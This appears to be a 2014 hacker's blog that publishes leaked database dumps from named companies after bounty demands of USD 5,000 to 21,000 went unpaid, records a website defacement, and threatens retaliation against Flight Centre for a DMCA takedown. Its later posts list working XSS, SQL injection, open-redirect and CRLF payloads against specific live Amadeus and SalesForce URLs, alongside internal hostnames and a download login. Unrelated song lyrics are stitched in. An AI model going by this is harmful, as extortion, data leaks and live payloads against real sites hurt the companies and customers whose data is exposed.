Saturday, March 29, 2014

Hindustan Book Agency – dataBase Dump

Hindustan Book Agency ( http://goo.gl/kEa7ul )
dataBase Dump for hindbook.com :-
Password for zip: whiteHatMrNervous
Summary:
Date First Contacted:February 07, 2014
Reward demanded:USD 5,000
Any Reward Paid:No
Communication Channel:Got No Reply
Vulnerability ListSQL Injection
Infected object:Main website
Retest Infection:Definitely will
Leaked database dump/files:Yes
Received Respect:NA
Received Appreciation for Intimation about Existence of Security Vulnerabilities:NA
Hall of Fame:No
Hindustan Book Agency is a company that publishes books, OfCourse that is evident by the name. But despite the huge profits, they do not spend nor care much about their online security. Hence their data saved online including details of books they publish, Order information, contact details of who they deal with is all published online.

Flight Centre Travel Group – dataBase Dump

Flight Centre Travel Group (Australia based MNC)

dataBase Dump for fcm.travel :-
dataBase Dump for flightcentreassociates.com :-
Password for zip: whiteHatMrNervous(fcm.travel -> awp_users file contains encrypted passwords for 165 users including admin + email, phone etc. Other tables include email conversation between their customer/staff been carried online via website; flightcentreassociates.com -> shopdetails, tours contain confidential information valuable for competitors)
Vulnerability Details (Important): Flight Centre Travel Group uses ‘Parallels Plesk Panel’ for online login to server which is vulnerable to SQL Injection, Cross site scripting (XSS), Denial of Service, Remote Code Execution, Authentication Bypass, etc. I believe Parallels Plesk Panel current updated version might not be vulnerable to SQL Injection exploited here, but Flight Centre Travel Group’s IT Team had not updated theirs to the latest bug free version. It is because of this that I was able to exploit SQL Injection vulnerability to get access to their database. And then I asked them if the would pay a bug bounty for what I found. They didn’t reply, the very next day I published their leaked database online. Flight Centre Travel Group has not yet been able to catch me for this leak, now as they know Parallels Plesk Panel was at fault and is responsible for their database leak, they might want to take them to court.
Source (Parallels Plesk Panel is vulnerable or has serious security flaws):
http://www.cvedetails.com/product/21684/Parallels-Parallels-Plesk-Panel.html?vendor_id=5403
Being a whiteHat, I would strongly recommend Flight Centre Travel Group to upgrade Parallels Plesk Panel on all their domains / sub-domains to the latest version available onhttp://www.parallels.com/products/plesk. Only changing the sub domain for login from admin.fcm.travel or admin2.fcm.travel to any other does not protect you from any attacks. As I get list of all your sub domains using dns-mapping. I saw you removed login page from admin2.fcm.travel & admin.fcm.travel, but that move is no good. Please hire some good professional in your IT team, which do regularly check if the technologies they are using are obsolete or not. Lets hope such attacks do not occur again, lets hope that you will take a lesson from this and will not give me another chance to compromise your security and flee with your data in my bag.
Summary:
Date First Contacted:February 09, 2014
Reward demanded:USD 5,000
Any Reward Paid:No
Communication Channel:No Reply
Vulnerability List :SQL Injection
Infected object:Main domain
Retest Infection:Definitely will(Vulnerability exists as on 12 March 2014)
Leaked database dump/files:Yes
Received Respect:No
Received Appreciation for Intimation about Existence of Security Vulnerabilities:No
Hall of Fame:No
It is really disheartening to see how vulnerable companies under Flight Centre Travel Group (Australia) are.  Our details including our travel plans, contact details, etc are all stored by these Travel companies in their dataBase, which is now leaked only because their security is incompetent.
In Travel & Tourism Industry, Flight Centre Travel Group is a big name, a Multi National Company. They promise their clients that they are using best in class technology to gain confidence. While in reality, this is not the case. In addition to this, their staff also ignores a warning email sent to Flight Centre Travel Group informing them about the flaw in security. Now that they know, no one has yet gathered enough courage to come up and talk to the Pentester, provide him with a reward for finding flaw; and in-turn avoid this ShowUp. And they instead took a more drastic step which Amadeus IT Group, Abacus, Hindustan Book Agency, MatchMeCupid, SalesForce did not, they sent a notice under DMCA (Digital Media Copyright Act) for Copyright Infringement to take down the dataBase files uploaded by the pentester. This aggravated the whole situation and the pentester is now focussed on Flight Centre Travel Group of companies to find flaws in all of them and download their data to later publish it online. So that, next time they and any other company thinks twice before sending a Take Down notice or taking any action of any kind against the Tester.
Now it might just be the time, when the customers of Flight Centre Travel Group will rethink on whether they should continue to deal with this company as they do not actively monitor nor safeguard the security of their dataBase, which contains their client’s private data, contact details, and a lot.
If you are one of their Client or planning to deal with them for your travel plans, or if you even send them queries for travel plan, Please be informed that all the data you share with them will be all out there, published on the Internet. You might then want to file law suits against them if your confidential data is among the data which is leaked.
Flight Centre Travel Group, I will bring you on your knees!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Elizabeth Susan Carter – Photography
Store: http://goo.gl/kEa7ul
Facebook: http://goo.gl/mFei5t
Contact: http://goo.gl/ulA9Lm
About: http://goo.gl/pwPdiq
PortFolio:-

Unit Nexus – Deface

Unit Nexus
Have defaced http://www.unitnexus.com
unitnexus.com
unitnexus.com.wmnr
google_search
Reason of deface: Unit Nexus is a company that cheats job seekers. It takes students from Universities and gives them an offer letter. After which they are asked to pay for a 3 or 6 month industrial training program wherein they will be working on live projects, completing which they will get an assured job. They are not paid and nor they get a job post program completion.

Amadeus

Job seekers beware!
Working in Amadeus, how is it like?
Amadeus says that they have adopted new technology and not using the legacy systems anymore, however the same is a false statement. ‘Your technology partner’ is a line below in their logo below ‘Amadeus’, yet they do not have the security measures in place to find and eliminate security flaws in their own websites (made in Java – jsp & servlets) and the Amadeus Vista Selling Platform (developed using Visual C++).
The truth is, the old developers who made the application have left the company. Hence now the new people / freshers aren’t able to make good changes in the application (as they don’t understand the Architecture, poor people) and hence Amadeus is stuck. The applications like the Vista selling platform does not incorporate any major changes, infact the connectivity bugs are also not fixed as the company is short on resources. Amadeus has failed to retain good employees and hence their market value is depreciating. They feel good that they are top in Travel Industry as there are very less number of development companies focusing on Travel Industry. When Amadeus is compared with other major companies like Google, Facebook, Yahoo, HTC, Apple, Toyota, Honda, etc that excel in their fields as well as hold a position when compared to major companies of other fields.
Stepping outside of Travel Industry, Amadeus stands no where and has no comparison with other giants. Amadeus says they are superior as they compare themselves to Abacus & Galileo who also have a Computer Reservation System in place in Travel Industry.
As the Travel & Tourism industry has got less exposure and the major IT companies have not stepped in. Amadeus running a race alone says ‘I came first’, hiding the fact that its the only one running the race. Phew!
Source: Glassdoor.com + Amadeus IT Group reviews
Employee-Review-Amadeus-RVW3214972Employee-Review-Amadeus-IT-Group-RVW3504076Employee-Review-Amadeus-IT-Group-RVW2875029Employee-Review-Amadeus-IT-Group-RVW2769871Employee-Review-Amadeus-India-RVW3820924

Unit Nexus – Fraud

Unit Nexus (Zirakpur, Punjab, India) is a Fraud company that hires students from Universities and then opens up a surprise package to them. Surprise package is that the students should first complete a 6 month training programme, for which there is a fee and students would get 100% assured job. No job is provided by the end of training. Unit Nexus frames a picture of an IT company having clients and offices abroad. Whereas, the truth is that it does not have any office or clients, rather it is only to promote their Educational unit, to provide training in order to earn money.
Anyway, here is the source code for their website:
Source: http://www.pissedconsumer.com/reviews-by-company/unit-nexus-it/unit-nexus-it-pvt-ltd-is-a-scam-company-it-has-no-clients-ever-and-is-just-a-training-center-in-dres-20130410399561.html
UnitNexus

Amadeus Vista Selling Platform – Penetration Testing

Penetration Testing - Amadeus Vista Selling Platform
Excuse moi, this one is for all Penetration Testers. You all are invited to test Amadeus Vista Selling Platform (don’t go by name, it works on all Windows XP, Vista, 7 etc; but on Windows only).
To proceed, download the file:
Start with ‘Amadeus_Selling_Platform_3.1P120_Installation_Guide.pdf’ file as it has all installation instructions, plus you would need some reverse engineering and the talentno spoon feeding please.
Message to beginners: this one is not for you. Lets hope after a few months we see Zero day security flaws in Amadeus Vista Selling platform on websites like cvedetails, packetstormsecurity, etc.
Then finally we will have a payload which our fellow testers could use using Metasploit. There is a lot of mess that can be done (a lot of potential I mean), hence we need to pull their eye open so they fix flaws.
Useful Tips:
Buffer Overflow & Remote Code Execution will top the list of flaws. FYI, its coded in Visual C++.
IP 82.150.248.28 ncewpo01-ext.dev.amadeus.net
Refer to http://api.dev.amadeus.net for their code structure, in C & messages in XML.
Could also download some PDF’s here: http://www.mirrorupload.net/file/E1KHYPYT/#!pdf.zip
And SEO (search engine optimization) people can download AWStats for api.dev.amadeus.net here: http://www.mirrorupload.net/file/1APAGLFL/#!awstats.pl.zip
In yet another review, a developer not from the best university says that Amadeus is yet using the old technology and has not upgraded:
Hacker review
References:
http://www.sca.amadeus.com/download -> click on category -> user:download, pass:gogetit
amadeusvista.com
certificates.amadeusvista.com/sgwadmin
diagnostic.amadeus.com/travelagencies
webconfig.amadeus.com/diagnostic
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Elizabeth Susan Carter – Photography
Store: http://goo.gl/kEa7ul
Facebook: http://goo.gl/mFei5t
Contact: http://goo.gl/ulA9Lm
About: http://goo.gl/pwPdiq
PortFolio:-

Song – Lips of an Angel

Honey why are you calling me so late?
It’s kinda hard to talk right now
Honey why are you crying, is everything okay?
I gotta whisper cause I can’t be too loud
Well, my girl’s in the next room
Sometimes I wish she was you
I guess we never really moved on
It’s really good to hear your voice saying my name
It sounds so sweet
Coming from the lips of an angel
Hearing those words it makes me weak
And I never wanna say goodbye
But girl you make it hard to be faithful
With the lips of an angel
It’s funny that you’re calling me tonight
And yes I’ve dreamt of you too
And does he know you’re talking to me?
Will it start a fight?
No I don’t think she has a clue
Well my girl’s in the next room
Sometimes I wish she was you
I guess we never really moved on
It’s really good to hear your voice saying my name
It sounds so sweet
Coming from the lips of an angel
Hearing those words it makes me weak
And I never wanna say goodbye
But girl you make it hard to be faithful
With the lips of an angel
It’s really good to hear your voice saying my name
It sounds so sweet
Coming from the lips of an angel
Hearing those words it makes me weak
And I never wanna say goodbye
But girl you make it hard to be faithful
With the lips of an angel
And I never wanna say goodbye
But girl you make it hard to be faithful
With the lips of an angel
Honey why are you calling me so late?

Song – El Paso

Out in the West Texas town of El Paso
I fell in love with a Mexican girl
Night time would find me in Rosa’s cantina
Music would play and Feleena would whirl
Blacker than night where the eyes of Feleena
Wicked and evil while casting a spell
My love was deep for this Mexican maiden
I was in love, but in vain I could tell
One night a wild young cowboy came in
Wild as the West Texas wind
Dashing and daring, a drink he was sharing
With wicked Feleena, the girl that I loved
So in anger
I challenged his right for the love of this maiden
Down went his hand for the gun that he wore
My challenge was answered in less than a heartbeat
The handsome young stranger lay dead on the floor
Just for a moment
I stood there in silence
Shocked by the foul evil deed I had done
Many thoughts raced through my mind as I stood there
I had but one chance and that was to run
Out through the back door of Rosa’s I ran
Out where the horses were tied
I caught a good one
It looked like it could run
Up on its back and away I did ride
Just as fast as I could
From the West Texas town of El Paso
Out to the badlands of New Mexico
Back in El Paso my life would be worthless
Everything’s gone in life, nothing is left
It’s been so long since I’ve seen the young maiden
My love is stronger than my fear of death
I saddled up and away I did go
Riding alone in the dark
Maybe tomorrow a bullet may find me
Tonight nothing’s worse than this pain in my heart
And at last here I am
On the hill overlooking El Paso
I can see Rosa’s cantina below
My love is strong and it pushes me onward
Down off the hill to Feleena I go
Off to my right I see five mounted cowboys
Off to my left ride a dozen or more
Shouting and shooting I can’t let them catch me
I have to make it to Rosa’s back door
Something is dreadfully wrong for I feel
A deep burning pain in my side
Though I am trying to stay in the saddle
I’m getting weary, unable to ride
But my love for Feleena is strong
And I rise where I’ve fallen
Though I am weary I can’t stop to rest
I see the white puff of smoke from the rifle
I feel the bullet go deep in my chest
From out of nowhere Feleena has found me
Kissing my cheek as she kneels by my side
Cradled by two loving arms that I’ll die for
One little kiss and Feleena, goodbye

Song – Et Si Tu N’Existais Pas

And if you didn’t exist
Tell me why I should exist
To drag along in a world without you
Without hope and without regret
And if you didn’t exist
I would try to invent love
As a painter who sees from beneath his fingers
the day’s colours being born
and wonders about them.
And if you didn’t exist
Tell me why I should exist
Passing girls, asleep in my arms
That I would never love
And if you didn’t exist
I would only be another dot
in this world, which comes and goes
I would feel lost
I would need you
And if you didn’t exist
Tell me how I would
I could pretend to be me
But it wouldn’t be true
And if you didn’t exist
I think that I would have found
The secret of life, the WHY
Only to create you
And to look at you
And if you didn’t exist
Tell me why I should exist
To drag along in a world without you
Without hope and without regret
And if you didn’t exist
I would try to invent love
As a painter who sees from beneath his fingers
the day’s colours being born
and wonders about them.

Wednesday, January 22, 2014

Sales Force - Public Disclosure

Public Disclosure - SalesForce
They didn't reply back to answer whether or not they would offer a bounty If report bugs to them under Responsible Disclosure Policy. On their website, they say that they don't offer bug bounties and no Hall of Fame. Can you believe it? No Hall of Fame!
Cross site scripting & Breach attack in 2 sub-domains of SalesForce.
1. Cross-site Scripting
a) Domain: appexchangejp.salesforce.com
PoC: https://appexchangejp.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_920358'():;WhiteHatMrNervous
Vulnerable Parameter: tab
b) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_942833'():;WhiteHatMrNervous
Vulnerable Parameter: tab
2. BREACH attack
a) Domain: appexchange.salesforce.com
PoC: https://appexchange.salesforce.com/listingdetail?listingId=a0N30000001taX4EAI&revId=a0S3000000HAXRoEAP&tab=r_938289
Vulnerable Parameter: tab 
PoC Screenshots:-http://www.mirrorupload.net/file/Z1QWL06L/#!SalesForce.zip

Tuesday, January 21, 2014

Amadeus IT Group - Public Disclosure

Public Disclosure - Amadeus IT Group
Download PoC & Conversation screenshots:-
Password for PDF: whiteHatMrNervous
Summary:
Date First Contacted:December 27, 2013
Reward demanded:USD 21,000
Any Reward Paid:No
Communication Channel:Company rep only conversed via blog comments, gmail and hotmail ID, screenshots attached. Never used their official email, but traced IP of blog comment to Amadeus SAAS, FR
Vulnerability ListSQL Injection, Cross site scripting, HTTP Parameter Pollution, CRLF Injection, Open Redirect, Unicode transformation Issues
Infected object:Main website & sub-domains
Retest Infection:Definitely will
Leaked database dump/files:None
Received Respect:No
Received Appreciation for Intimation about Existence of Security Vulnerabilities:No
Hall of Fame:No
Amadeus IT Group (your technology partner) – Transaction processor for the global travel and tourism industry.
Amadeus IT Group is the most used GDS (Global Distribution System, France based, Germany influenced) by Travel & Tour companies. Amadeus IT Group stores confidential client data in plain text on their servers. This data is stored and used by Travel & tour companies that operate Amadeus GDS. Amadeus GDS has a feature called client profile, wherein each employee of the company can create/access/modify data of their companies clients. This data includes Full name, date of birth, address, Passport & visa details, Credit card numbers with pin and expiry details. Their web service and GDS application is also vulnerable to stack overflow, remote code execution, etc. And their website is vulnerable to what-so-ever is mentioned below. Amadeus IT Group is a virgin, only is known largely by and in Travel & Tour industry. Hence, Hat Hackers never audited security of Amadeus IT Group and its various products.
A] Cross Site Scripting (Amadeus XSS)
1.       URL: amadeus.com/cgi-bin/appl/list.pl [Get]
Infected Parameters: 3 (whiteHatMrNervous reflected in returned source code)
?cat_nr=C97F6457-8274-43D5-8942-2C17F30D8DBA” onmouseover=prompt(whiteHatMrNervous) bad=”
?job_nr=8F3C4897-6F62-40BE-83C2-A802C5AA201E–><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!–
?loc_nr=6DC8EDF4-30C5-11D4-B90E-0050BAE619BE–><ScRiPt>prompt(whiteHatMrNervous)</ScRiPt><!–
2.       URL: amadeus.com/linkhotel/nominate-hotel.html [POST (multipart) input]
Infected Parameters: 9 (whiteHatMrNervous reflected in returned source code)
?city=San Francisco” onmouseover=prompt(whiteHatMrNervous) bad=”
?clients_corporations=1″ onmouseover=prompt(whiteHatMrNervous) bad=”
?company=MatchMeCupidCheatsFreelancers” onmouseover=prompt(whiteHatMrNervous) bad=”
?email=SalesForce@hasXSS.com” onmouseover=prompt(whiteHatMrNervous) bad=”
?first_name=AmadeusXSS” onmouseover=prompt(whiteHatMrNervous) bad=”
?last_name=HackersParadise” onmouseover=prompt(whiteHatMrNervous) bad=”
?rate_access_code=94102″ onmouseover=prompt(whiteHatMrNervous) bad=”
?telephone=555-666-0606″ onmouseover=prompt(whiteHatMrNervous) bad=”
?top_locations=1″ onmouseover=prompt(whiteHatMrNervous) bad=”
3.       URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?srchfor=0_978176%26quot;():; whiteHatMrNervous
4.       URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp [Get]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?lastname=del”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?postalcode=94102″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?province=NY”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?username=whiteHatMrNervous”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
5.       URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?start=1′sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=’>
6.       URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp [Get]
Infected Parameters: 4 (whiteHatMrNervous reflected in returned source code)
?btn=dosrch”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?keywords=1″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
?srchfor=0′sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=’>
?wrd=1″sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
7.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp [Get]
Infected Parameter: 1 (whiteHatMrNervous reflected in returned source code)
?nodetree=choosesite”sTYLe=’acu:Expre/**/SSion(prompt(whiteHatMrNervous))’bad=”>
B] SQL Injection
1.       URL: amadeus.com/cgi-bin/appl/list.pl
Infected Parameters: 3
?cat_nr=1′”
?job_nr=1′”
?loc_nr=1′”
2.       URL: myamadeus.net/homepage.aspx
Infected Parameter: 2
?ctl00%24txtPwd=’+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+’
?ctl00%24txtUserid=’+(select convert(int,CHAR(52)+CHAR(67)) FROM syscolumns)+’
C] Open Redirect
1.       URL: amadeus.com/corpweb/amaweb1camp.nsf/request
Infected Parameter: 1
?redirect=http://www.whiteHatMrNervous.blogspot.com
2.       URL: amadeus.com/corpweb/eformstawfv2.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
3.       URL: amadeus.com/corpweb/eformstowf.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
4.       URL: amadeus.com/corpweb/hotelcampaignsen.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
5.       URL: amadeus.com/corpweb/newsletters_cars_forms.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
6.       URL: amadeus.com/corpweb/online_traveller_study_event.nsf/request
Infected Parameter: 1
?redirect=http://www. whiteHatMrNervous.blogspot.com
E] CRLF Injection
1.       URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?siteid=SomeCustomInjectedHeader:injected_by_whiteHatMrNervous
2.       URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp
Infected Parameter: 1
?start=SomeCustomInjectedHeader:injected_by_ whiteHatMrNervous
3.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_validate.jsp
Infected Parameter: 1
?nodetree=SomeCustomInjectedHeader:injected_by_ whiteHatMrNervous
F] Unicode transformation issues
1.       URL: alc.amadeus.com/ilearn/en/learner/jsp/create_self_reg_user.jsp
Infected Parameter: 1
?address1= whiteHatMrNervous9929%C0%BEz1%C0%BCz2a%90bcxyyy9929
2.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=pcjndrci&address1=acux9929>z1<z2a%EF%BF%BDbcxuca9929&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?city= whiteHatMrNervous1690%C0%BEz1%C0%BCz2a%90bcxyyy1690
3.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=tbewfsld&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=acux1690>z1<z2a%EF%BF%BDbcxuca1690&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?country= whiteHatMrNervous8949%C0%BEz1%C0%BCz2a%90bcxyyy8949
4.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ldsbvqpp&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=acux8949>z1<z2a%EF%BF%BDbcxuca8949&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?familiarname= whiteHatMrNervous3871%C0%BEz1%C0%BCz2a%90bcxyyy3871
5.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=acux3871>z1<z2a%EF%BF%BDbcxuca3871&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?firstname= whiteHatMrNervous9454%C0%BEz1%C0%BCz2a%90bcxyyy9454
6.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=acux9454>z1<z2a%EF%BF%BDbcxuca9454&lastname=del&familiarname=ibxwwpis&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?Language= whiteHatMrNervous3664%C0%BEz1%C0%BCz2a%90bcxyyy3664
7.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=ndomggee&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=acux3664>z1<z2a%EF%BF%BDbcxuca3664&Activity=-1&site=Europe&nodetree=choosesite
?lastname= whiteHatMrNervous1260%C0%BEz1%C0%BCz2a%90bcxyyy1260
8.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=acux1260>z1<z2a%EF%BF%BDbcxuca1260&familiarname=ghdjqguv&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?postalcode= whiteHatMrNervous3683%C0%BEz1%C0%BCz2a%90bcxyyy3683
9.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=sngjchwn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=acux3683>z1<z2a%EF%BF%BDbcxuca3683&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?province= whiteHatMrNervous9518%C0%BEz1%C0%BCz2a%90bcxyyy9518
10.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=jokctcch&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=acux9518>z1<z2a%EF%BF%BDbcxuca9518&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
?site= whiteHatMrNervous9340%C0%BEz1%C0%BCz2a%90bcxyyy9340
11.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username=whiteHatMrNervous&firstname=del&lastname=del&familiarname=iiaukhmo&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=acux9340>z1<z2a%EF%BF%BDbcxuca9340&nodetree=choosesite
?username= whiteHatMrNervous3710%C0%BEz1%C0%BCz2a%90bcxyyy3710
12.       URL: alc.amadeus.com/ilearn/en/learner/jsp/self_reg_form.jsp?siteid=26090&username= whiteHatMrNervous3710>z1<z2a%EF%BF%BDbcxyyy3710&firstname=del&lastname=del&familiarname=lfbykbbn&address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&city=del&province=NY&country=del&postalcode=94102&email=whiteHatMrNervous@gmail.com&errormsg=The%20Activity%20user%20attribute%20must%20be%20specified.&Language=-1&Activity=-1&site=Europe&nodetree=choosesite
13.       URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket_process.jsp?start= whiteHatMrNervous9935%C0%BEz1%C0%BCz2a%90bcxyyy9935
14.       URL: alc.amadeus.com/ilearn/en/learner/jsp/order_ticket.jsp?start= whiteHatMrNervous9935%3Ez1%3Cz2a%FDbcxyyy9935
15.       URL: alc.amadeus.com/ilearn/en/learner/jsp/search_process.jsp?btn= whiteHatMrNervous2700%C0%BEz1%C0%BCz2a%90bcxyyy2700
16.       URL: alc.amadeus.com/ilearn/en/learner/jsp/search_all.jsp?aor=0&btn=acux2700%C0%BEz1%C0%BCz2a%90bcxuca2700&cert=A&col=0&CompetencyId=&datechoice=S&daterng=1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?keywords= whiteHatMrNervous7201%C0%BEz1%C0%BCz2a%90bcxyyy7201
17.       URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=acux7201%C0%BEz1%C0%BCz2a%90bcxuca7201&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?srchfor= whiteHatMrNervous5083%C0%BEz1%C0%BCz2a%90bcxyyy5083
18.       URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=advsrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=acux5083%C0%BEz1%C0%BCz2a%90bcxuca5083&START_DD=-1&START_MM=-1&START_YR=-1&wrd=1
?wrd= whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
19.       URL: alc.amadeus.com/ilearn/en/learner/jsp/advanced_search.jsp?aor=0&btn=dosrch&cert=A&col=0&CompetencyId=&datechoice=S&daterng=-1&dlvm=0&END_DD=-1&END_MM=-1&END_YR=-1&keywords=&lang=ALL&mat=0&srchfor=0&START_DD=-1&START_MM=-1&START_YR=-1&wrd= whiteHatMrNervous4367%C0%BEz1%C0%BCz2a%90bcxyyy4367
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Elizabeth Susan Carter – Photography
Store: http://goo.gl/kEa7ul
Facebook: http://goo.gl/mFei5t
Contact: http://goo.gl/ulA9Lm
About: http://goo.gl/pwPdiq
PortFolio:-